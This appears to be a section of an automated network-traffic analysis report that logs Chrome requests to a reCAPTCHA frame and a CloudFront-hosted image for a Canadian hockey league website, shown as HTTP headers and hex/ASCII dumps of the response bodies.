                                                                                                                          Data Ascii: {if(!H.I){H.P++;try{for(y=(x=(c=H.N,0),void 0);--r;)try{if(u=void 0,H.V)y=B$(H.V,H);else{if((x=k(H,468),x)>=c)break;y=k(H,(u=(v(90,H,x),M(H)),u))}t(false,(y&&y[eJ]&2048?y(H,r):g(0,[C,21,u],H),r),false,H)}catch(G){k(H,493)?g(22,G,H):v(493,H,G)}if(!r){if(H.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          138192.168.11.2049968142.251.111.1054431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC1050OUTGET /recaptcha/api2/bframe?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                          2025-01-13 21:01:22 UTC1161INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-RfdXwTChiOi9XGj32I86Jw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2025-01-13 21:01:22 UTC94INData Raw: 31 65 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                          Data Ascii: 1e14<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69
                                                                                                                          Data Ascii: text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstati
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 57 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20
                                                                                                                          Data Ascii: weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7WxKOzY.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329,
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 41 42 63 34 45 73 41 2e 77 6f 66
                                                                                                                          Data Ascii: de-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fABc4EsA.wof
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 68 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44 2d 30 32 43 35 2c 20 55 2b 30 32 43 37 2d 30 32 43 43 2c 20 55 2b 30 32 43 45 2d 30 32 44 37 2c 20 55 2b 30 32 44 44 2d 30 32 46 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20
                                                                                                                          Data Ascii: -family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308,
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 30 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55
                                                                                                                          Data Ascii: 00-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCBc4EsA.woff2) format('woff2'); unicode-range: U
                                                                                                                          2025-01-13 21:01:22 UTC1255INData Raw: 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75
                                                                                                                          Data Ascii: 020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2) format('woff2'); u
                                                                                                                          2025-01-13 21:01:22 UTC84INData Raw: 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d 5d 22 29 3b 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: ,null,null,null,null,null,null,null,null,0]]"); </script></body></html>
                                                                                                                          2025-01-13 21:01:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          139192.168.11.204996954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC648OUTGET /app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 113124
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:23 GMT
                                                                                                                          Last-Modified: Thu, 28 Nov 2024 19:19:09 GMT
                                                                                                                          ETag: "d1893f6c477be37e8388dc8b656b9def"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 df08ba5d249ec7fb2513313ea66b59f8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 64eeSFGyIJj0olONBB9Psc4e7P4rUMt8N-XoQelnIe2f5laSMbHYbQ==
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 4d 47 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 32 36 20 31 32 3a 35
                                                                                                                          Data Ascii: JFIFMGExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:26 12:5
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: b1 5c cc 61 23 7e 9b 70 72 60 94 65 43 70 94 d9 da 42 6e 8b 5b 4a ee 61 61 c6 aa 0a 32 8d cb 16 14 a6 6a 74 dd 9b 08 4b 8a 12 90 f0 cf d5 90 47 86 70 ff 00 37 85 ca c9 98 91 44 7d 4f 77 fc 89 d4 f5 bb 87 d7 6c 74 69 22 82 ee 68 a3 9a 26 95 4b 7c 31 92 86 9b 8f e7 cd 2e bb 51 e2 e5 33 2e 4e 18 70 44 07 a2 e8 de 6e f3 de 8f 70 6c fc cd a5 4b 7b 00 6f 83 50 b5 50 c6 9f e5 28 df ee 19 88 5b 59 4a 79 f7 cb 44 03 2c ef 01 3d 56 68 a4 42 3e 75 5c 44 49 e4 82 40 56 8f ce de 53 7a 01 aa db 82 7b 33 85 3f 8e 13 8e 43 a2 89 02 8e 8b 5c d1 a5 fe ea f6 07 f9 48 a7 f8 e1 38 66 39 82 c4 4e 27 aa 25 2e 6d 9c 7c 12 a3 7c 98 1c 87 09 65 6b ea 87 b8 3f 2c 09 5a 63 43 be 15 58 d0 a7 5e 38 ab ff d0 e0 6b 34 91 2b cc 25 3c 89 1b 57 7a f8 8f a3 36 38 f2 48 83 92 52 f5 5f f9 fc
                                                                                                                          Data Ascii: \a#~pr`eCpBn[Jaa2jtKGp7D}Owlti"h&K|1.Q3.NpDnplK{oPP([YJyD,=VhB>u\DI@VSz{3?C\H8f9N'%.m||ek?,ZcCX^8k4+%<Wz68HR_
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:
                                                                                                                          2025-01-13 21:01:22 UTC4404INData Raw: f1 9c 10 d1 4a 22 89 ad 8d 8d 1b 34 0c 06 a8 c5 6d 95 cf b1 90 a7 a8 81 a2 46 cf 11 7c cd 96 33 18 07 98 c9 cf cc 61 5f a7 ec 67 6c ec fd 8c 56 c1 4b 5f 51 04 52 30 41 55 4d 1c e1 ba bd 97 e4 b4 8c 78 f3 5c 9e a1 cf 49 c4 ba ad 7b 90 fb 49 e1 7f b2 ac bc 30 06 bd b5 39 cb 7a b7 18 df f2 f9 a9 61 de de a1 22 72 8f 6d a2 c3 80 a4 8c c5 0b ce 3d 66 f3 f3 57 58 9f 23 45 72 fc 4e 89 4b 74 a4 88 86 ba 50 71 e1 ba 94 74 49 96 90 57 d3 ca 71 1b c1 2a e4 91 0d 92 0c a7 49 23 a2 96 83 66 6a f3 7a a5 a0 d5 3d 53 8b f4 7d d5 1f 2c 4f 66 69 fd aa 56 3e b9 b4 34 36 2a c7 bc ec 03 5a 06 3e 7e ff 00 05 7f a4 f5 bd 94 7a ab 7a 46 eb 87 e7 bb d6 c2 d9 ab e0 65 23 8e fa 0b f5 3b 1f 0d 96 76 5e b4 d7 62 fd e7 61 d5 47 40 91 97 e2 8b 70 ac 0d d2 dc 92 47 ea aa 9a d1 2f 05 35
                                                                                                                          Data Ascii: J"4mF|3a_glVK_QR0AUMx\I{I09za"rm=fWX#ErNKtPqtIWq*I#fjz=S},OfiV>46*Z>~zzFe#;v^baG@pG/5
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: df 8f 05 e0 ba b6 24 a9 bd f6 ec cf 5d d3 af 8c e9 5d fb a3 a2 d6 54 99 21 68 6f 2e 65 73 51 a6 65 6c d5 56 f8 f0 e9 a5 60 78 dc 64 ef f2 52 2a 4a 4f b1 22 1b eb 1c c1 e8 51 4d 50 f7 3b 43 7e cc 86 e7 de 9e cb 15 1a fe 66 54 f1 95 7f 11 5a 2c 17 0b a5 4b 9d 1b 69 18 d7 77 10 90 0b 81 38 e6 85 3d bd 03 9d 31 5d bb 94 5c 31 64 a8 e2 0a ca 6b fd 6d 34 f4 cd 6c 21 ac 86 57 97 12 f3 cd c7 f2 4d a0 e4 d2 db 3a 43 18 23 a5 63 71 b8 18 50 44 14 86 22 22 39 9a 4f 8a 1a 1a 96 de 89 1c 67 69 1c 53 c2 35 f6 e0 dc bd f0 97 47 b7 29 1b bb 7f 31 8f 8a b6 a9 71 92 66 6b ab dc 5a 30 bf 46 3a b7 fd 6d 7f a5 39 0d 10 42 e2 df 02 1c e1 fb ae 9b 38 a9 34 cb 8e dd bb 1e a6 e2 1a 2a 8e 27 b2 44 d8 ee b4 ec 32 54 42 d1 b5 53 00 dc ff 00 9c 0f 9a d9 89 95 e9 be 32 f0 46 70 e4 8f
                                                                                                                          Data Ascii: $]]T!ho.esQelV`xdR*JO"QMP;C~fTZ,Kiw8=1]\1dkm4l!WM:C#cqPD""9OgiS5G)1qfkZ0F:m9B84*'D2TBS2Fp
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 9c 7e c1 79 6c da 9d 57 4a 0c e8 42 5b 8a 68 d6 ac a4 86 6a ab 69 a8 98 64 a9 9e 38 58 39 b9 ee c0 40 b6 55 0e 35 e1 b2 e2 c1 7a a1 d4 39 8e f9 bf cd 58 aa 9b f6 17 35 f2 65 78 a3 b6 4b 4d a8 ba 9e d6 59 5d 51 cb 50 3e a3 7d e5 74 31 7a 55 d7 77 6b 48 a2 cc a8 43 dc e4 dc 47 da 5d 6d ee 63 1d c2 be 42 d7 1d a0 8b 2d 60 f7 f8 af 4b 8b d2 69 a2 4b 97 93 9d 66 54 ec 5f 89 9d a9 e2 26 b4 6c e0 d1 ef 5d f5 08 c5 77 39 dc 5b 65 7b f8 82 9d dc de 09 55 4f 26 a8 f9 65 d0 c6 93 2a ae 77 71 53 4f 23 a1 cb 40 18 c8 f9 2e 6e 76 44 25 0d c1 f7 35 e3 d2 e2 f4 ca 68 be ce 9d f2 93 cf d5 1f ba c9 85 17 26 e4 cd 16 b4 96 91 56 58 d0 ec 81 93 e2 ba 18 f8 b0 ab ba f2 55 2b 5b 1c 60 c9 e4 b7 c1 15 36 5a 52 33 00 60 2d 0b b1 53 05 6d d2 1a 16 1c 90 e7 8f ba 3c 56 2c dc e8 63
                                                                                                                          Data Ascii: ~ylWJB[hjid8X9@U5z9X5exKMY]QP>}t1zUwkHCG]mcB-`KiKfT_&l]w9[e{UO&e*wqSO#@.nvD%5h&VXU+[`6ZR3`-Sm<V,c
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 4b 9a 88 0c 4e 39 04 61 6c 69 35 a2 a5 b5 dc c4 3e 33 eb 46 ef 6a 32 5a bc 5d d0 e1 37 13 ab 17 b4 39 45 50 e8 5f 80 71 82 a3 19 68 4d 17 76 a9 59 43 5d 1d 74 0f 92 09 5a e0 f0 63 38 c3 86 e0 f9 29 ba e2 d3 5f 22 ee 7b 6f 85 ee 9f 5d f0 e5 b6 e4 48 2e a9 a6 8e 47 63 f1 16 8c fe 79 5e 56 c8 f1 93 89 be 2f 6b 65 a2 81 20 c1 40 01 00 0c 84 00 32 10 01 20 01 84 00 78 40 05 a7 28 10 08 08 01 05 a8 18 30 9e c4 0d 92 18 02 00 3c 04 00 ad 28 00 00 80 06 10 01 61 00 0c 04 00 08 08 00 90 07 cf aa e7 c6 f8 d8 01 cb 82 eb f5 1b 2b 9e 94 7c a2 8a a2 d7 91 8a 6a 39 27 70 d2 30 3c 56 6a 31 27 67 7f 08 94 ed 4b b1 d3 f8 3b b2 2b df 11 32 3a 8a 96 fd 5f 42 71 f6 f3 8c 39 e3 fc 2d e6 7f 45 6f 53 fa 83 0b a5 55 bc 9b 3b af 6f 76 46 ac 59 dd 2f c5 1d 29 bd 89 f0 e4 74 c2 3a
                                                                                                                          Data Ascii: KN9ali5>3Fj2Z]79EP_qhMvYC]tZc8)_"{o]H.Gcy^V/ke @2 x@(0<(a+|j9'p0<Vj1'gK;+2:_Bq9-EoSU;ovFY/)t:
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 75 18 5d 2e 29 77 33 9d b4 70 f5 2d e3 83 26 b9 4a e1 1d 5d b0 89 22 90 fd e0 e2 1a 59 f1 c8 3f 05 de ff 00 0e ba ad ee e9 61 cb 6e 3e 7f a1 9b aa d1 1e 2a 6b c9 e7 58 a4 c9 c3 b6 2b ec b1 91 e7 98 f1 56 91 27 5a dd bb c7 5d 97 5b a5 3e f2 46 6c 95 b4 8b 12 32 17 64 c8 90 9c 60 a9 12 d0 e3 50 47 42 b0 93 0d 00 80 e1 ba 8b 43 2a eb 29 f1 53 80 36 76 0e cb 83 9d 57 1b 7b 7b 9b aa 9e e2 2e f1 4e ef 44 8a 38 1a 7d ad da 14 7a be 2c e7 8f 15 4a f0 c5 8d 34 a6 dc 8b cb 64 b9 a6 8c 4d b4 8d 1a 4f bc 2e d6 27 3f 46 2a cf 3a 30 5d ae 6f 5e 09 85 8d 23 23 04 2d 05 23 6d 88 36 50 5a 36 ca 8b f0 34 7b 1f 87 1a 1b c3 d6 c6 b4 e4 0a 48 80 fe 00 be 57 91 ff 00 56 5b f9 67 a8 ab f9 11 60 a9 26 1a 00 08 00 20 00 80 02 00 08 00 20 03 40 01 00 1a 00 08 00 90 01 69 08 00 16
                                                                                                                          Data Ascii: u].)w3p-&J]"Y?an>*kX+V'Z][>Fl2d`PGBC*)S6vW{{.ND8}z,J4dMO.'?F*:0]o^##-#m6PZ64{HWV[g`& @i
